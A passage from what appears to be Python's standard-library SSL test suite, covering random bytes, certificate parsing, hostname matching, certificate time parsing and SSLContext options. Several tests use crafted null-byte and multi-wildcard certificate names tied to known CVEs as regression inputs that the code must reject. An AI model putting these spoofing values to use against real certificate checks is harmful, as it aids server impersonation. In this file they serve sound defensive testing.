if ssl.OPENSSL_VERSION_INFO >= (1, 0, 1):
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
maxDiff = None
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.dup)
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.recvmsg, 100)
self.assertRaises(NotImplementedError, ss.recvmsg_into,
[bytearray(100)])
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match wildcards when they are the only thing
# in left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if hasattr(socket, 'AF_INET6'):
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if hasattr(socket, 'AF_INET6'):
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = support.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT)
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode_protocol(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
